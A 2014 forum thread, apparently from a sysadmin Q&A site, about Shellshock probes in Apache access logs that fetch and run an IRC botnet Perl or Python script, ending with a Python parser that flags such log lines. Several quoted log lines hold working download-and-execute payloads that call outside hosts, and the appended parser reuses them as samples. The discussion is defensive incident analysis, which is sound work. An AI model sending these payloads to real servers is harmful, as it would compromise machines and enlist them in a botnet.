
I saw the following line under /var/log/apache2/access_log:

"GET /cgi-bin/hi HTTP/1.0" 404 357 "-" "() { :;}; /bin/bash -c "cd /tmp;wget http://213.5.67.223/jurat;curl -O /tmp/jurat http://213.5.67.223/jurat ; perl /tmp/jurat;rm -rf /tmp/jurat\""

I had not gotten around to patching bash yet. I shut down the machine immediately.

Has anyone seen this in their logs and/or examined the Perl script found at http://213.5.67.223/jurat? It seems fairly benign, but I want to know how worried I should be.

On line 338 you can see the shell function executes a shell command that was fetched from someone on the other end of an IRC channel:

my @resp=`$comando 2>&1 3>&1`;

This is executed with the same user level as the apache server. I just hope they were not able to escalate privileges.

wcochran
  • There is another discussion on this script-kiddie attempt [here](http://superuser.com/questions/818257/is-this-an-attack-or-something-to-be-concerned-about-shellshock) – Arul Selvan Oct 04 '14 at 14:25
  • See another thread on this here: http://superuser.com/questions/818257/is-this-an-attack-or-something-to-be-concerned-about-shellshock – Arul Selvan Oct 04 '14 at 14:27

3 Answers

2

I haven't looked at the details, but it doesn't look benign to me:

sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[GOOGLE]\002 Exploited ".$exploited." boxes in ".$1." seconds.");

This looks to me like some kind of botnet script. Scary. Get patched up, people.

UPDATE: The analysis in this blog:

"If the script is successfully executed then the infected host will connect to an IRC channel hard coded in the script and wait for commands."

That's badder than Baddy McBad.

chiastic-security
  • It certainly looks scary, but it doesn't look like it changed the state of the machine (e.g. installed a root kit). I am hoping I don't need to do a reinstall. – wcochran Sep 27 '14 at 21:09
  • Probably not... but if it really did connect to the IRC channel and wait for commands, it's anyone's guess as to what those commands were. You could get some confidence by using `find` to look for any changed files in the last 24h. – chiastic-security Sep 27 '14 at 21:10
  • Yes -- I see in the `shell` function that a shell command is exec'ed that was retrieved from the IRC user. McBad indeed. At least it's not run as root?!? – wcochran Sep 27 '14 at 22:08
1

I've had such lines in my access_log, but some were slightly different:

""() { :;}; /bin/bash -c \"cd /tmp;wget http://213.5.67.223/ji;curl -O /tmp/ji http://213.5.67.223/jurat ; perl /tmp/ji;rm -rf /tmp/ji;rm -rf /tmp/ji*\""

=> now you can download it and you will obtain the villain perl script: http://pastie.org/9604492

nice example of another IRC bot exploit :) hope that helps

scavenger
  • It is kind of interesting to read these scripts. Too bad these folks can use their knowledge for good. – wcochran Oct 05 '14 at 22:16
1

See link on similar thread: https://superuser.com/questions/818257/is-this-an-attack-or-something-to-be-concerned-about-shellshock

This is a script-kiddie attempt to exploit the bash vulnerability to execute a perl script based IRC bot. If you have bash updated, and in addition, if you run apache under chroot like I do, you have nothing to worry about. I see several versions of this on my log (see below) at least every other day since 9/27...this is just noise.

12.64.2d.static.xlhost.com - - [27/Sep/2014:12:36:34 -0500] "GET /cgi-bin/hi HTTP/1.0" 404 1023 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://213.5.67.223/jurat;curl -O /tmp/jurat http://213.5.67.223/jurat ; perl /tmp/jurat;rm -rf /tmp/jurat\""        
12.64.2d.static.xlhost.com - - [29/Sep/2014:00:39:41 -0500] "GET /cgi-bin/hi HTTP/1.0" 404 1023 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://213.5.67.223/ji;curl -O /tmp/ji http://213.5.67.223/jurat ; perl /tmp/ji;rm -rf /tmp/ji;rm -rf /tmp/ji*\""        
web21.qna.vengit.com - - [01/Oct/2014:04:52:24 -0500] "GET /cgi-bin/hi HTTP/1.0" 404 1023 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://89.33.193.10/ji;curl -O /tmp/ji http://89.33.193.10/ji ; perl /tmp/ji;rm -rf /tmp/ji\""

Another variety of script (python script) execution attempt I just noticed today ... NOTE: google-traffic-analytics.com where the python script is downloaded has nothing to do w/ Google of course.

cm232.delta210.maxonline.com.sg - - [04/Oct/2014:01:45:38 -0500] "GET /cgi-sys/entropysearch.cgi HTTP/1.1" 404 1193 "http://xxxx.xxx/cgi-sys/entropysearch.cgi" "() { :;}; /bin/bash -c \"/usr/bin/env curl -s http://google-traffic-analytics.com/cl.py > /tmp/clamd_update; chmod +x /tmp/clamd_update; /tmp/clamd_update > /dev/null& sleep 5; rm -rf /tmp/clamd_update\""
localhost - - [04/Oct/2014:01:45:41 -0500] "GET /cgi-sys/entropysearch.cgi HTTP/1.1" 404 1193 "http://xxxx.xxx/cgi-sys/entropysearch.cgi" "() { :;}; /bin/bash -c \"/usr/bin/env curl -s http://google-traffic-analytics.com/cl.py > /tmp/clamd_update; chmod +x /tmp/clamd_update; /tmp/clamd_update > /dev/null& sleep 5; rm -rf /tmp/clamd_update\""
169.118.103.218.static.netvigator.com - - [04/Oct/2014:01:45:45 -0500] "GET /cgi-sys/entropysearch.cgi HTTP/1.1" 404 1193 "http://xxxx.xxx/cgi-sys/entropysearch.cgi" "() { :;}; /bin/bash -c \"/usr/bin/env curl -s http://google-traffic-analytics.com/cl.py > /tmp/clamd_update; chmod +x /tmp/clamd_update; /tmp/clamd_update > /dev/null& sleep 5; rm -rf /tmp/clamd_update\""
mm-2-192-57-86.dynamic.pppoe.mgts.by - - [04/Oct/2014:01:45:52 -0500] "GET /cgi-sys/entropysearch.cgi HTTP/1.1" 404 1193 "http://xxxx.xxx/cgi-sys/entropysearch.cgi" "() { :;}; /bin/bash -c \"/usr/bin/env curl -s http://google-traffic-analytics.com/cl.py > /tmp/clamd_update; chmod +x /tmp/clamd_update; /tmp/clamd_update > /dev/null& sleep 5; rm -rf /tmp/clamd_update\""
Arul Selvan
  • Thanks. I've since patched bash and no damage was done. My machines are always under some sort of attack. Evil is always busy on the internet. – wcochran Oct 05 '14 at 22:15
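The log excerpts in the question and in the last answer all carry the same Shellshock trigger (`() { :;};`) in the User-Agent field, followed by a download-and-run command. The following script, added here as an example and not code from any poster on this page, parses Apache combined-format lines, flags the ones carrying that trigger in the request line, Referer or User-Agent, and pulls out the client, the probed path, the response status and the hosts the injected command tries to fetch from, so the hits can be fed into blocking or incident notes. The sample lines are constructed to resemble the excerpts above; the `10.0.0.x` clients are placeholders.

```python
import re
from urllib.parse import urlparse

# Apache "combined" format. Quoted fields may contain \" because Apache escapes
# embedded quotes, so the Referer/User-Agent groups accept escaped characters.
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>(?:[^"\\]|\\.)*)" '
    r'"(?P<agent>(?:[^"\\]|\\.)*)"'
)
# Shellshock trigger: an exported-function definition followed by trailing commands.
SHELLSHOCK_RE = re.compile(r'\(\)\s*\{\s*:\s*;\s*\}\s*;')
# Download locations named inside the injected command (second-stage hosts).
URL_RE = re.compile(r'https?://[^\s;"\\]+')

# Constructed sample lines, modelled on the excerpts quoted in the answers above.
SAMPLE_LOG = r'''
12.64.2d.static.xlhost.com - - [27/Sep/2014:12:36:34 -0500] "GET /cgi-bin/hi HTTP/1.0" 404 1023 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://213.5.67.223/jurat;curl -O /tmp/jurat http://213.5.67.223/jurat ; perl /tmp/jurat;rm -rf /tmp/jurat\""
10.0.0.5 - - [04/Oct/2014:01:45:38 -0500] "GET /cgi-sys/entropysearch.cgi HTTP/1.1" 404 1193 "http://xxxx.xxx/cgi-sys/entropysearch.cgi" "() { :;}; /bin/bash -c \"/usr/bin/env curl -s http://google-traffic-analytics.com/cl.py > /tmp/clamd_update; chmod +x /tmp/clamd_update; /tmp/clamd_update > /dev/null& sleep 5; rm -rf /tmp/clamd_update\""
10.0.0.9 - - [04/Oct/2014:09:12:01 -0500] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64)"
'''

def parse_line(line):
    """Split one combined-format line into named fields, or return None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def find_shellshock(lines):
    """Return one record per line whose request, Referer or User-Agent carries the trigger."""
    hits = []
    for line in lines:
        rec = parse_line(line.strip())
        if rec is None:
            continue
        tainted = [rec[f] for f in ("request", "referer", "agent") if SHELLSHOCK_RE.search(rec[f])]
        if not tainted:
            continue
        urls = sorted({u for f in tainted for u in URL_RE.findall(f)})
        parts = rec["request"].split()
        hits.append({
            "client": rec["host"],
            "time": rec["time"],
            "target": parts[1] if len(parts) > 1 else rec["request"],
            "status": rec["status"],          # 404 means the probed CGI path did not exist
            "payload_urls": urls,
            "payload_hosts": sorted({urlparse(u).hostname for u in urls}),
        })
    return hits

if __name__ == "__main__":
    for hit in find_shellshock(SAMPLE_LOG.splitlines()):
        print(hit)
```

Run it against a real file with `find_shellshock(open("/var/log/apache2/access_log"))`; the `payload_hosts` values are what you would hand to egress filtering or a blocklist.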